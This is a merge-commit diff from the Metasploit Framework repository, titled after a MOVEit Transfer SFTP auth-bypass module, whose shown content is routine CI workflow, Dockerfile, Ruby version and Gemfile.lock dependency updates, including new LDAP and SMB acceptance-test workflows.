Land #19295, MOVEit Transfer SFTP auth bypass

Co-authored-by: Diego Ledda <diego_ledda@rapid7.com>

.github/ISSUE_TEMPLATE/config.yml

@@ -2,4 +2,7 @@ blank_issues_enabled: false
 contact_links:
   - name: Termux Issues?
     url: https://github.com/rapid7/metasploit-framework/issues/11023
-    about: Termux is not officially supported, check here for more info
+    about: Termux is not officially supported, check here for more info
+  - name: Android Payload Issues?
+    url: https://github.com/rapid7/metasploit-framework/issues/19154
+    about: Check here for more info

.github/workflows/acceptance.yml

@@ -52,7 +52,7 @@ jobs:
       fail-fast: false
       matrix:
         os:
-          - macos-11
+          - macos-12
           - windows-2019
           - ubuntu-20.04
         ruby:
@@ -62,20 +62,21 @@ jobs:
           - { name: python, runtime_version: 3.6 }
           - { name: python, runtime_version: 3.11 }
 
-          # Java - newer versions of Java are not supported currently: https://github.com/rapid7/metasploit-payloads/issues/647
+          # Java
           - { name: java, runtime_version: 8 }
+          - { name: java, runtime_version: 21 }
 
-          # PHP - Temporarily removed as tests are timing out on Github actions
-          # - { name: php, runtime_version: 5.3 }
-          # - { name: php, runtime_version: 7.4 }
-          # - { name: php, runtime_version: 8.2 }
+          # PHP
+          - { name: php, runtime_version: 5.3 }
+          - { name: php, runtime_version: 7.4 }
+          - { name: php, runtime_version: 8.3 }
         include:
           # Windows Meterpreter
           - { meterpreter: { name: windows_meterpreter }, os: windows-2019 }
           - { meterpreter: { name: windows_meterpreter }, os: windows-2022 }
 
           # Mettle
-          - { meterpreter: { name: mettle }, os: macos-11 }
+          - { meterpreter: { name: mettle }, os: macos-12 }
           - { meterpreter: { name: mettle }, os: ubuntu-20.04 }
 
     runs-on: ${{ matrix.os }}
@@ -87,6 +88,8 @@ jobs:
       HOST_RUNNER_IMAGE: ${{ matrix.os }}
       METERPRETER: ${{ matrix.meterpreter.name }}
       METERPRETER_RUNTIME_VERSION: ${{ matrix.meterpreter.runtime_version }}
+      # pcaprub skipped until new version released: https://github.com/pcaprub/pcaprub/issues/70
+      BUNDLE_WITHOUT: "coverage development pcaprub"
 
     name: ${{ matrix.meterpreter.name }} ${{ matrix.meterpreter.runtime_version }} ${{ matrix.os }}
     steps:
@@ -94,7 +97,7 @@ jobs:
         if: runner.os == 'Linux'
         run: sudo apt-get -y --no-install-recommends install libpcap-dev graphviz
 
-      - uses: shivammathur/setup-php@6d7209f44a25a59e904b1ee9f3b0c33ab2cd888d
+      - uses: shivammathur/setup-php@fc14643b0a99ee9db10a3c025a33d76544fa3761
         if: ${{ matrix.meterpreter.name == 'php' }}
         with:
           php-version: ${{ matrix.meterpreter.runtime_version }}
@@ -130,9 +133,16 @@ jobs:
       - name: Checkout code
         uses: actions/checkout@v4
 
+      # pcaprub skipped until new version released: https://github.com/pcaprub/pcaprub/issues/70
+      - name: Remove pcaprub dependency
+        shell: pwsh
+        if: runner.os == 'Windows'
+        run: |
+          Set-Content -Path "Gemfile.lock" -Value (Get-Content -Path "Gemfile.lock" | Select-String -Pattern 'pcaprub' -NotMatch | Select-String -Pattern 'packetfu' -NotMatch)
+          Set-Content -Path "metasploit-framework.gemspec" -Value (Get-Content -Path "metasploit-framework.gemspec" | Select-String -Pattern 'pcaprub' -NotMatch | Select-String -Pattern 'packetfu' -NotMatch)
+
       - name: Setup Ruby
         env:
-          BUNDLE_WITHOUT: "coverage development"
           BUNDLE_FORCE_RUBY_PLATFORM: true
         uses: ruby/setup-ruby@v1
         with:
@@ -184,7 +194,6 @@ jobs:
       - name: Setup Ruby
         if: always()
         env:
-          BUNDLE_WITHOUT: "coverage development"
           BUNDLE_FORCE_RUBY_PLATFORM: true
         uses: ruby/setup-ruby@v1
         with:

.github/workflows/labels.yml

@@ -195,7 +195,7 @@ jobs:
                   close: true,
                   comment: `
                     Thanks for your contribution to Metasploit Framework! We've looked at this issue, and unfortunately we do not currently have the bandwidth to prioritize this issue.
-            
+
                     We've labeled this as \`attic\` and closed it for now. If you believe this issue has been closed in error, or that it should be prioritized, please comment with additional information.
                   `
                 }

.github/workflows/ldap_acceptance.yml

@@ -0,0 +1,164 @@
+name: Acceptance
+
+# Optional, enabling concurrency limits: https://docs.github.com/en/actions/using-jobs/using-concurrency
+#concurrency:
+#  group: ${{ github.ref }}-${{ github.workflow }}
+#  cancel-in-progress: ${{ github.ref != 'refs/heads/main' }}
+
+# https://docs.github.com/en/actions/using-workflows/workflow-syntax-for-github-actions#permissions
+permissions:
+  actions: none
+  checks: none
+  contents: none
+  deployments: none
+  id-token: none
+  issues: none
+  discussions: none
+  packages: none
+  pages: none
+  pull-requests: none
+  repository-projects: none
+  security-events: none
+  statuses: none
+
+on:
+  push:
+    branches-ignore:
+      - gh-pages
+      - metakitty
+  pull_request:
+    branches:
+      - '*'
+    paths:
+      - 'metsploit-framework.gemspec'
+      - 'Gemfile.lock'
+      - '**/**ldap**'
+      - 'spec/acceptance/**'
+      - 'spec/support/acceptance/**'
+      - 'spec/acceptance_spec_helper.rb'
+      - '.github/**'
+#   Example of running as a cron, to weed out flaky tests
+#  schedule:
+#    - cron: '*/15 * * * *'
+
+jobs:
+  ldap:
+    runs-on: ${{ matrix.os }}
+    timeout-minutes: 40
+
+    strategy:
+      fail-fast: true
+      matrix:
+        ruby:
+          - '3.2'
+        os:
+          - ubuntu-latest
+
+    env:
+      RAILS_ENV: test
+      BUNDLE_WITHOUT: "coverage development pcap"
+
+    name: LDAP Acceptance - ${{ matrix.os }} - Ruby ${{ matrix.ruby }}
+    steps:
+      - name: Install system dependencies
+        run: sudo apt-get install -y --no-install-recommends libpcap-dev graphviz
+
+      - name: Checkout code
+        uses: actions/checkout@v4
+
+      - name: Run samba/ldap docker container
+        working-directory: 'test/ldap'
+        run: |
+          docker compose build
+          docker compose up --wait -d
+
+      - name: Setup Ruby
+        env:
+          # Nokogiri doesn't release pre-compiled binaries for preview versions of Ruby; So force compilation with BUNDLE_FORCE_RUBY_PLATFORM
+          BUNDLE_FORCE_RUBY_PLATFORM: "${{ contains(matrix.ruby, 'preview') && 'true' || 'false' }}"
+        uses: ruby/setup-ruby@v1
+        with:
+          ruby-version: '${{ matrix.ruby }}'
+          bundler-cache: true
+
+      - name: acceptance
+        env:
+          SPEC_HELPER_LOAD_METASPLOIT: false
+          SPEC_OPTS: "--tag acceptance --require acceptance_spec_helper.rb --color --format documentation --format AllureRspec::RSpecFormatter"
+          RUNTIME_VERSION: latest
+        # Unix run command:
+        #   SPEC_HELPER_LOAD_METASPLOIT=false bundle exec ./spec/acceptance
+        # Windows cmd command:
+        #   set SPEC_HELPER_LOAD_METASPLOIT=false
+        #   bundle exec rspec .\spec\acceptance
+        # Note: rspec retry is intentionally not used, as it can cause issues with allure's reporting
+        # Additionally - flakey tests should be fixed or marked as flakey instead of silently retried
+        run: |
+          bundle exec rspec spec/acceptance/ldap_spec.rb
+
+      - name: Archive results
+        if: always()
+        uses: actions/upload-artifact@v4
+        with:
+          # Provide a unique artifact for each matrix os, otherwise race conditions can lead to corrupt zips
+          name: ldap-acceptance-${{ matrix.os }}
+          path: tmp/allure-raw-data
+
+  # Generate a final report from the previous test results
+  report:
+    name: Generate report
+    needs:
+      - ldap
+    runs-on: ubuntu-latest
+    if: always()
+
+    steps:
+      - name: Checkout code
+        uses: actions/checkout@v4
+        if: always()
+
+      - name: Install system dependencies (Linux)
+        if: always()
+        run: sudo apt-get -y --no-install-recommends install libpcap-dev graphviz
+
+      - name: Setup Ruby
+        if: always()
+        env:
+          BUNDLE_FORCE_RUBY_PLATFORM: true
+        uses: ruby/setup-ruby@v1
+        with:
+          ruby-version: '${{ matrix.ruby }}'
+          bundler-cache: true
+          cache-version: 4
+          # Github actions with Ruby requires Bundler 2.2.18+
+          # https://github.com/ruby/setup-ruby/tree/d2b39ad0b52eca07d23f3aa14fdf2a3fcc1f411c#windows
+          bundler: 2.2.33
+
+      - uses: actions/download-artifact@v4
+        id: download
+        if: always()
+        with:
+          # Note: Not specifying a name will download all artifacts from the previous workflow jobs
+          path: raw-data
+
+      - name: allure generate
+        if: always()
+        run: |
+          export VERSION=2.22.1
+
+          curl -o allure-$VERSION.tgz -Ls https://github.com/allure-framework/allure2/releases/download/$VERSION/allure-$VERSION.tgz
+          tar -zxvf allure-$VERSION.tgz -C .
+
+          ls -la ${{steps.download.outputs.download-path}}
+          ./allure-$VERSION/bin/allure generate ${{steps.download.outputs.download-path}}/* -o ./allure-report
+
+          find ${{steps.download.outputs.download-path}}
+          bundle exec ruby tools/dev/report_generation/support_matrix/generate.rb --allure-data ${{steps.download.outputs.download-path}} > ./allure-report/support_matrix.html
+
+      - name: archive results
+        if: always()
+        uses: actions/upload-artifact@v4
+        with:
+          name: final-report-${{ github.run_id }}
+          path: |
+            ./allure-report

.github/workflows/lint.yml

@@ -31,11 +31,14 @@ jobs:
     runs-on: ubuntu-latest
     timeout-minutes: 40
 
+    env:
+      BUNDLE_WITHOUT: "coverage development pcap"
+
     strategy:
       fail-fast: true
       matrix:
         ruby:
-          - '3.0'
+          - '3.1'
 
     name: Lint msftidy
     steps:
@@ -53,8 +56,6 @@ jobs:
         with:
           ruby-version: '${{ matrix.ruby }}'
           bundler-cache: true
-        env:
-          BUNDLE_WITHOUT: "coverage development pcap"
 
       - name: Run msftidy
         run: |

.github/workflows/mssql_acceptance.yml

@@ -36,6 +36,7 @@ on:
       - 'spec/acceptance/**'
       - 'spec/support/acceptance/**'
       - 'spec/acceptance_spec_helper.rb'
+      - '.github/**'
 #   Example of running as a cron, to weed out flaky tests
 #  schedule:
 #    - cron: '*/15 * * * *'
@@ -71,6 +72,8 @@ jobs:
 
     env:
       RAILS_ENV: test
+      BUNDLE_WITHOUT: "coverage development pcap"
+
 
     name: ${{ matrix.docker_image }} - ${{ matrix.os }} - Ruby ${{ matrix.ruby }}
     steps:
@@ -82,7 +85,6 @@ jobs:
 
       - name: Setup Ruby
         env:
-          BUNDLE_WITHOUT: "coverage development pcap"
           # Nokogiri doesn't release pre-compiled binaries for preview versions of Ruby; So force compilation with BUNDLE_FORCE_RUBY_PLATFORM
           BUNDLE_FORCE_RUBY_PLATFORM: "${{ contains(matrix.ruby, 'preview') && 'true' || 'false' }}"
         uses: ruby/setup-ruby@v1
@@ -141,7 +143,6 @@ jobs:
       - name: Setup Ruby
         if: always()
         env:
-          BUNDLE_WITHOUT: "coverage development"
           BUNDLE_FORCE_RUBY_PLATFORM: true
         uses: ruby/setup-ruby@v1
         with:

.github/workflows/mysql_acceptance.yml

@@ -36,6 +36,7 @@ on:
       - 'spec/acceptance/**'
       - 'spec/support/acceptance/**'
       - 'spec/acceptance_spec_helper.rb'
+      - '.github/**'
 #   Example of running as a cron, to weed out flaky tests
 #  schedule:
 #    - cron: '*/15 * * * *'
@@ -65,12 +66,11 @@ jobs:
           - ubuntu-latest
         target:
           - { version: "mariadb:latest", health_cmd: "mariadb -uroot -ppassword -e 'SELECT version()'" }
-          - { version: "mariadb:5.5.42", health_cmd: "mysql -uroot -ppassword -e 'SELECT version()'" }
           - { version: "mysql:latest", health_cmd: "mysql -uroot -ppassword -e 'SELECT version()'" }
-          - { version: "mysql:5.5.42", health_cmd: "mysql -uroot -ppassword -e 'SELECT version()'" }
 
     env:
       RAILS_ENV: test
+      BUNDLE_WITHOUT: "coverage development pcap"
 
     name: ${{ matrix.target.version }} - ${{ matrix.os }} - Ruby ${{ matrix.ruby }}
     steps:
@@ -82,7 +82,6 @@ jobs:
 
       - name: Setup Ruby
         env:
-          BUNDLE_WITHOUT: "coverage development pcap"
           # Nokogiri doesn't release pre-compiled binaries for preview versions of Ruby; So force compilation with BUNDLE_FORCE_RUBY_PLATFORM
           BUNDLE_FORCE_RUBY_PLATFORM: "${{ contains(matrix.ruby, 'preview') && 'true' || 'false' }}"
         uses: ruby/setup-ruby@v1
@@ -141,7 +140,6 @@ jobs:
       - name: Setup Ruby
         if: always()
         env:
-          BUNDLE_WITHOUT: "coverage development"
           BUNDLE_FORCE_RUBY_PLATFORM: true
         uses: ruby/setup-ruby@v1
         with:

.github/workflows/postgres_acceptance.yml

@@ -36,6 +36,7 @@ on:
       - 'spec/acceptance/**'
       - 'spec/support/acceptance/**'
       - 'spec/acceptance_spec_helper.rb'
+      - '.github/**'
 #   Example of running as a cron, to weed out flaky tests
 #  schedule:
 #    - cron: '*/15 * * * *'
@@ -71,6 +72,7 @@ jobs:
 
     env:
       RAILS_ENV: test
+      BUNDLE_WITHOUT: "coverage development pcap"
 
     name: ${{ matrix.docker_image }} - ${{ matrix.os }} - Ruby ${{ matrix.ruby }}
     steps:
@@ -82,7 +84,6 @@ jobs:
 
       - name: Setup Ruby
         env:
-          BUNDLE_WITHOUT: "coverage development pcap"
           # Nokogiri doesn't release pre-compiled binaries for preview versions of Ruby; So force compilation with BUNDLE_FORCE_RUBY_PLATFORM
           BUNDLE_FORCE_RUBY_PLATFORM: "${{ contains(matrix.ruby, 'preview') && 'true' || 'false' }}"
         uses: ruby/setup-ruby@v1
@@ -141,7 +142,6 @@ jobs:
       - name: Setup Ruby
         if: always()
         env:
-          BUNDLE_WITHOUT: "coverage development"
           BUNDLE_FORCE_RUBY_PLATFORM: true
         uses: ruby/setup-ruby@v1
         with:

.github/workflows/smb_acceptance.yml

@@ -0,0 +1,166 @@
+name: Acceptance
+
+# Optional, enabling concurrency limits: https://docs.github.com/en/actions/using-jobs/using-concurrency
+#concurrency:
+#  group: ${{ github.ref }}-${{ github.workflow }}
+#  cancel-in-progress: ${{ github.ref != 'refs/heads/main' }}
+
+# https://docs.github.com/en/actions/using-workflows/workflow-syntax-for-github-actions#permissions
+permissions:
+  actions: none
+  checks: none
+  contents: none
+  deployments: none
+  id-token: none
+  issues: none
+  discussions: none
+  packages: none
+  pages: none
+  pull-requests: none
+  repository-projects: none
+  security-events: none
+  statuses: none
+
+on:
+  push:
+    branches-ignore:
+      - gh-pages
+      - metakitty
+  pull_request:
+    branches:
+      - '*'
+    paths:
+      - 'metsploit-framework.gemspec'
+      - 'Gemfile.lock'
+      - '**/**smb**'
+      - 'spec/acceptance/**'
+      - 'spec/support/acceptance/**'
+      - 'spec/acceptance_spec_helper.rb'
+      - '.github/**'
+#   Example of running as a cron, to weed out flaky tests
+#  schedule:
+#    - cron: '*/15 * * * *'
+
+jobs:
+  smb:
+    runs-on: ${{ matrix.os }}
+    timeout-minutes: 40
+
+    strategy:
+      fail-fast: true
+      matrix:
+        ruby:
+          - '3.2'
+        os:
+          - ubuntu-latest
+
+    env:
+      RAILS_ENV: test
+      SMB_USERNAME: acceptance_tests_user
+      SMB_PASSWORD: acceptance_tests_password
+      BUNDLE_WITHOUT: "coverage development pcap"
+
+    name: SMB Acceptance - ${{ matrix.os }} - Ruby ${{ matrix.ruby }}
+    steps:
+      - name: Install system dependencies
+        run: sudo apt-get install -y --no-install-recommends libpcap-dev graphviz
+
+      - name: Checkout code
+        uses: actions/checkout@v4
+
+      - name: Run docker container
+        working-directory: 'test/smb'
+        run: |
+          docker compose build
+          docker compose up --wait -d
+
+      - name: Setup Ruby
+        env:
+          # Nokogiri doesn't release pre-compiled binaries for preview versions of Ruby; So force compilation with BUNDLE_FORCE_RUBY_PLATFORM
+          BUNDLE_FORCE_RUBY_PLATFORM: "${{ contains(matrix.ruby, 'preview') && 'true' || 'false' }}"
+        uses: ruby/setup-ruby@v1
+        with:
+          ruby-version: '${{ matrix.ruby }}'
+          bundler-cache: true
+
+      - name: acceptance
+        env:
+          SPEC_HELPER_LOAD_METASPLOIT: false
+          SPEC_OPTS: "--tag acceptance --require acceptance_spec_helper.rb --color --format documentation --format AllureRspec::RSpecFormatter"
+          RUNTIME_VERSION: 'latest'
+        # Unix run command:
+        #   SPEC_HELPER_LOAD_METASPLOIT=false bundle exec ./spec/acceptance
+        # Windows cmd command:
+        #   set SPEC_HELPER_LOAD_METASPLOIT=false
+        #   bundle exec rspec .\spec\acceptance
+        # Note: rspec retry is intentionally not used, as it can cause issues with allure's reporting
+        # Additionally - flakey tests should be fixed or marked as flakey instead of silently retried
+        run: |
+          bundle exec rspec spec/acceptance/smb_spec.rb
+
+      - name: Archive results
+        if: always()
+        uses: actions/upload-artifact@v4
+        with:
+          # Provide a unique artifact for each matrix os, otherwise race conditions can lead to corrupt zips
+          name: smb_acceptance-${{ matrix.os }}
+          path: tmp/allure-raw-data
+
+  # Generate a final report from the previous test results
+  report:
+    name: Generate report
+    needs:
+      - smb
+    runs-on: ubuntu-latest
+    if: always()
+
+    steps:
+      - name: Checkout code
+        uses: actions/checkout@v4
+        if: always()
+
+      - name: Install system dependencies (Linux)
+        if: always()
+        run: sudo apt-get -y --no-install-recommends install libpcap-dev graphviz
+
+      - name: Setup Ruby
+        if: always()
+        env:
+          BUNDLE_FORCE_RUBY_PLATFORM: true
+        uses: ruby/setup-ruby@v1
+        with:
+          ruby-version: '${{ matrix.ruby }}'
+          bundler-cache: true
+          cache-version: 4
+          # Github actions with Ruby requires Bundler 2.2.18+
+          # https://github.com/ruby/setup-ruby/tree/d2b39ad0b52eca07d23f3aa14fdf2a3fcc1f411c#windows
+          bundler: 2.2.33
+
+      - uses: actions/download-artifact@v4
+        id: download
+        if: always()
+        with:
+          # Note: Not specifying a name will download all artifacts from the previous workflow jobs
+          path: raw-data
+
+      - name: allure generate
+        if: always()
+        run: |
+          export VERSION=2.22.1
+
+          curl -o allure-$VERSION.tgz -Ls https://github.com/allure-framework/allure2/releases/download/$VERSION/allure-$VERSION.tgz
+          tar -zxvf allure-$VERSION.tgz -C .
+
+          ls -la ${{steps.download.outputs.download-path}}
+          ./allure-$VERSION/bin/allure generate ${{steps.download.outputs.download-path}}/* -o ./allure-report
+
+          find ${{steps.download.outputs.download-path}}
+          bundle exec ruby tools/dev/report_generation/support_matrix/generate.rb --allure-data ${{steps.download.outputs.download-path}} > ./allure-report/support_matrix.html
+
+      - name: archive results
+        if: always()
+        uses: actions/upload-artifact@v4
+        with:
+          name: final-report-${{ github.run_id }}
+          path: |
+            ./allure-report

.github/workflows/verify.yml

@@ -64,10 +64,10 @@ jobs:
       fail-fast: true
       matrix:
         ruby:
-          - '3.0'
           - '3.1'
           - '3.2'
-          - '3.3.0-preview3'
+          - '3.3'
+          - '3.4.0-preview1'
         os:
           - ubuntu-20.04
           - ubuntu-latest
@@ -86,6 +86,7 @@ jobs:
 
     env:
       RAILS_ENV: test
+      BUNDLE_WITHOUT: "coverage development pcap"
 
     name: ${{ matrix.os }} - Ruby ${{ matrix.ruby }} - ${{ matrix.test_cmd }}
     steps:
@@ -97,7 +98,6 @@ jobs:
 
       - name: Setup Ruby
         env:
-          BUNDLE_WITHOUT: "coverage development pcap"
           # Nokogiri doesn't release pre-compiled binaries for preview versions of Ruby; So force compilation with BUNDLE_FORCE_RUBY_PLATFORM
           BUNDLE_FORCE_RUBY_PLATFORM: "${{ contains(matrix.ruby, 'preview') && 'true' || 'false' }}"
         uses: ruby/setup-ruby@v1

.mailmap

@@ -1,4 +1,5 @@
 adfoster-r7 <adfoster-r7@github>       <alandavid_foster@rapid7.com>
+adeherdt-r7 <adeherdt-r7@github>       Arne De Herdt <arne_deherdt@rapid7.com>
 bwatters-r7 <bwatters-r7@github>       <bwatters@rapid7.com>
 cdelafuente-r7 <cdelafuente-r7@github> Christophe De La Fuente <christophe_delafuente@rapid7.com>
 cdoughty-r7 <cdoughty-r7@github>       <chris_doughty@rapid7.com>
@@ -15,6 +16,7 @@ space-r7 <space-r7@github>             <shelby_pace@rapid7.com>
 todb-r7 <todb-r7@github>               <tod_beardsley@rapid7.com>
 todb-r7 <todb-r7@github>               <todb@metasploit.com>
 todb-r7 <todb-r7@github>               <todb@packetfu.com>
+dledda-r7 <dledda-r7@github>           <diego_ledda@rapid7.com>
 
 # Above this line are current Rapid7 employees. Below this paragraph are
 # volunteers, former employees, and potential Rapid7 employees who, at

.ruby-version

@@ -1 +1 @@
-3.0.5
+3.1.5

Dockerfile

@@ -1,4 +1,4 @@
-FROM ruby:3.1.4-alpine3.18 AS builder
+FROM ruby:3.1.5-alpine3.18 AS builder
 LABEL maintainer="Rapid7"
 
 ARG BUNDLER_CONFIG_ARGS="set no-cache 'true' set system 'true' set without 'development test coverage'"
@@ -53,7 +53,7 @@ RUN mkdir -p $TOOLS_HOME/bin && \
     cd go/src && \
     ./make.bash
 
-FROM ruby:3.1.4-alpine3.18
+FROM ruby:3.1.5-alpine3.18
 LABEL maintainer="Rapid7"
 ARG TARGETARCH
 

Gemfile.lock

@@ -1,7 +1,9 @@
 PATH
   remote: .
   specs:
-    metasploit-framework (6.4.4)
+    metasploit-framework (6.4.16)
+      aarch64
+      abbrev
       actionpack (~> 7.0.0)
       activerecord (~> 7.0.0)
       activesupport (~> 7.0.0)
@@ -10,20 +12,25 @@ PATH
       aws-sdk-iam
       aws-sdk-s3
       aws-sdk-ssm
+      base64
       bcrypt
       bcrypt_pbkdf
+      bigdecimal
       bootsnap
       bson
       chunky_png
+      csv
       dnsruby
+      drb
       ed25519
       em-http-request
       eventmachine
       faker
-      faraday
+      faraday (= 2.7.11)
       faraday-retry
       faye-websocket
       filesize
+      getoptlong
       hrr_rb_ssh-ed25519
       http-cookie
       irb (~> 1.7.4)
@@ -35,17 +42,19 @@ PATH
       metasploit-model
       metasploit-payloads (= 2.0.166)
       metasploit_data_models
-      metasploit_payloads-mettle (= 1.0.26)
+      metasploit_payloads-mettle (= 1.0.28)
       mqtt
       msgpack (~> 1.6.0)
+      mutex_m
       nessus_rest
       net-imap
       net-ldap
+      net-sftp
       net-smtp
       net-ssh
       network_interface
       nexpose
-      nokogiri (~> 1.14.0)
+      nokogiri
       octokit (~> 4.0)
       openssl-ccm
       openvas-omp
@@ -85,7 +94,7 @@ PATH
       rubyntlm
       rubyzip
       sinatra
-      sqlite3
+      sqlite3 (= 1.7.3)
       sshkey
       swagger-blocks
       thin
@@ -103,37 +112,40 @@ PATH
 GEM
   remote: https://rubygems.org/
   specs:
-    Ascii85 (1.1.0)
-    actionpack (7.0.8)
-      actionview (= 7.0.8)
-      activesupport (= 7.0.8)
+    Ascii85 (1.1.1)
+    aarch64 (2.1.0)
+      racc (~> 1.6)
+    abbrev (0.1.2)
+    actionpack (7.0.8.4)
+      actionview (= 7.0.8.4)
+      activesupport (= 7.0.8.4)
       rack (~> 2.0, >= 2.2.4)
       rack-test (>= 0.6.3)
       rails-dom-testing (~> 2.0)
       rails-html-sanitizer (~> 1.0, >= 1.2.0)
-    actionview (7.0.8)
-      activesupport (= 7.0.8)
+    actionview (7.0.8.4)
+      activesupport (= 7.0.8.4)
       builder (~> 3.1)
       erubi (~> 1.4)
       rails-dom-testing (~> 2.0)
       rails-html-sanitizer (~> 1.1, >= 1.2.0)
-    activemodel (7.0.8)
-      activesupport (= 7.0.8)
-    activerecord (7.0.8)
-      activemodel (= 7.0.8)
-      activesupport (= 7.0.8)
-    activesupport (7.0.8)
+    activemodel (7.0.8.4)
+      activesupport (= 7.0.8.4)
+    activerecord (7.0.8.4)
+      activemodel (= 7.0.8.4)
+      activesupport (= 7.0.8.4)
+    activesupport (7.0.8.4)
       concurrent-ruby (~> 1.0, >= 1.0.2)
       i18n (>= 1.6, < 2)
       minitest (>= 5.1)
       tzinfo (~> 2.0)
-    addressable (2.8.5)
+    addressable (2.8.6)
       public_suffix (>= 2.0.2, < 6.0)
     afm (0.2.2)
-    allure-rspec (2.23.0)
-      allure-ruby-commons (= 2.23.0)
+    allure-rspec (2.24.5)
+      allure-ruby-commons (= 2.24.5)
       rspec-core (>= 3.8, < 4)
-    allure-ruby-commons (2.23.0)
+    allure-ruby-commons (2.24.5)
       mime-types (>= 3.3, < 4)
       require_all (>= 2, < 4)
       rspec-expectations (~> 3.12)
@@ -141,59 +153,61 @@ GEM
     arel-helpers (2.14.0)
       activerecord (>= 3.1.0, < 8)
     ast (2.4.2)
-    aws-eventstream (1.2.0)
-    aws-partitions (1.834.0)
-    aws-sdk-core (3.185.1)
-      aws-eventstream (~> 1, >= 1.0.2)
+    aws-eventstream (1.3.0)
+    aws-partitions (1.941.0)
+    aws-sdk-core (3.197.0)
+      aws-eventstream (~> 1, >= 1.3.0)
       aws-partitions (~> 1, >= 1.651.0)
-      aws-sigv4 (~> 1.5)
+      aws-sigv4 (~> 1.8)
       jmespath (~> 1, >= 1.6.1)
-    aws-sdk-ec2 (1.411.0)
-      aws-sdk-core (~> 3, >= 3.184.0)
+    aws-sdk-ec2 (1.460.0)
+      aws-sdk-core (~> 3, >= 3.197.0)
       aws-sigv4 (~> 1.1)
-    aws-sdk-ec2instanceconnect (1.34.0)
-      aws-sdk-core (~> 3, >= 3.184.0)
+    aws-sdk-ec2instanceconnect (1.41.0)
+      aws-sdk-core (~> 3, >= 3.197.0)
       aws-sigv4 (~> 1.1)
-    aws-sdk-iam (1.87.0)
-      aws-sdk-core (~> 3, >= 3.184.0)
+    aws-sdk-iam (1.99.0)
+      aws-sdk-core (~> 3, >= 3.197.0)
       aws-sigv4 (~> 1.1)
-    aws-sdk-kms (1.72.0)
-      aws-sdk-core (~> 3, >= 3.184.0)
+    aws-sdk-kms (1.83.0)
+      aws-sdk-core (~> 3, >= 3.197.0)
       aws-sigv4 (~> 1.1)
-    aws-sdk-s3 (1.136.0)
-      aws-sdk-core (~> 3, >= 3.181.0)
+    aws-sdk-s3 (1.152.0)
+      aws-sdk-core (~> 3, >= 3.197.0)
       aws-sdk-kms (~> 1)
-      aws-sigv4 (~> 1.6)
-    aws-sdk-ssm (1.158.0)
-      aws-sdk-core (~> 3, >= 3.184.0)
+      aws-sigv4 (~> 1.8)
+    aws-sdk-ssm (1.170.0)
+      aws-sdk-core (~> 3, >= 3.197.0)
       aws-sigv4 (~> 1.1)
-    aws-sigv4 (1.6.0)
+    aws-sigv4 (1.8.0)
       aws-eventstream (~> 1, >= 1.0.2)
-    base64 (0.1.1)
-    bcrypt (3.1.19)
-    bcrypt_pbkdf (1.1.0)
+    base64 (0.2.0)
+    bcrypt (3.1.20)
+    bcrypt_pbkdf (1.1.1)
+    bigdecimal (3.1.8)
     bindata (2.4.15)
-    bootsnap (1.16.0)
+    bootsnap (1.18.3)
       msgpack (~> 1.2)
-    bson (4.15.0)
+    bson (5.0.0)
     builder (3.2.4)
     byebug (11.1.3)
     chunky_png (1.4.0)
     coderay (1.1.3)
-    concurrent-ruby (1.2.2)
-    cookiejar (0.3.3)
+    concurrent-ruby (1.3.1)
+    cookiejar (0.3.4)
     crass (1.0.6)
+    csv (3.3.0)
     daemons (1.4.1)
-    date (3.3.3)
+    date (3.3.4)
     debug (1.8.0)
       irb (>= 1.5.0)
       reline (>= 0.3.1)
     diff-lcs (1.5.1)
-    dnsruby (1.70.0)
+    dnsruby (1.72.1)
       simpleidn (~> 0.2.1)
     docile (1.4.0)
-    domain_name (0.5.20190701)
-      unf (>= 0.0.5, < 1.0.0)
+    domain_name (0.6.20240107)
+    drb (2.2.1)
     ed25519 (1.3.0)
     em-http-request (1.1.7)
       addressable (>= 2.3.4)
@@ -205,26 +219,27 @@ GEM
       eventmachine (>= 1.0.0.beta.4)
     erubi (1.12.0)
     eventmachine (1.2.7)
-    factory_bot (6.2.1)
+    factory_bot (6.4.6)
       activesupport (>= 5.0.0)
-    factory_bot_rails (6.2.0)
-      factory_bot (~> 6.2.0)
+    factory_bot_rails (6.4.3)
+      factory_bot (~> 6.4)
       railties (>= 5.0.0)
-    faker (3.2.1)
+    faker (3.4.1)
       i18n (>= 1.8.11, < 2)
     faraday (2.7.11)
       base64
       faraday-net_http (>= 2.0, < 3.1)
       ruby2_keywords (>= 0.0.4)
     faraday-net_http (3.0.2)
-    faraday-retry (2.2.0)
+    faraday-retry (2.2.1)
       faraday (~> 2.0)
     faye-websocket (0.11.3)
       eventmachine (>= 0.12.0)
       websocket-driver (>= 0.5.1)
-    ffi (1.16.3)
+    ffi (1.17.0)
     filesize (0.2.0)
     fivemat (1.3.7)
+    getoptlong (0.2.1)
     gssapi (1.3.1)
       ffi (>= 1.0.1)
     gyoku (1.4.0)
@@ -235,25 +250,25 @@ GEM
     hrr_rb_ssh-ed25519 (0.4.2)
       ed25519 (~> 1.2)
       hrr_rb_ssh (>= 0.4)
-    http-cookie (1.0.5)
+    http-cookie (1.0.6)
       domain_name (~> 0.5)
     http_parser.rb (0.8.0)
     httpclient (2.8.3)
-    i18n (1.14.1)
+    i18n (1.14.5)
       concurrent-ruby (~> 1.0)
-    io-console (0.6.0)
+    io-console (0.7.2)
     irb (1.7.4)
       reline (>= 0.3.6)
     jmespath (1.6.2)
     jsobfu (0.4.2)
       rkelly-remix
-    json (2.6.3)
+    json (2.7.2)
     language_server-protocol (3.17.0.3)
     little-plugger (1.1.4)
-    logging (2.3.1)
+    logging (2.4.0)
       little-plugger (~> 1.1)
       multi_json (~> 1.14)
-    loofah (2.21.3)
+    loofah (2.22.0)
       crass (~> 1.0.2)
       nokogiri (>= 1.12.0)
     macaddr (1.7.2)
@@ -265,7 +280,7 @@ GEM
       activesupport (~> 7.0)
       railties (~> 7.0)
       zeitwerk
-    metasploit-credential (6.0.7)
+    metasploit-credential (6.0.9)
       metasploit-concern
       metasploit-model
       metasploit_data_models (>= 5.0.0)
@@ -290,35 +305,39 @@ GEM
       railties (~> 7.0)
       recog
       webrick
-    metasploit_payloads-mettle (1.0.26)
-    method_source (1.0.0)
-    mime-types (3.5.1)
+    metasploit_payloads-mettle (1.0.28)
+    method_source (1.1.0)
+    mime-types (3.5.2)
       mime-types-data (~> 3.2015)
-    mime-types-data (3.2023.1003)
-    mini_portile2 (2.8.4)
-    minitest (5.20.0)
+    mime-types-data (3.2024.0604)
+    mini_portile2 (2.8.7)
+    minitest (5.23.1)
     mqtt (0.6.0)
     msgpack (1.6.1)
     multi_json (1.15.0)
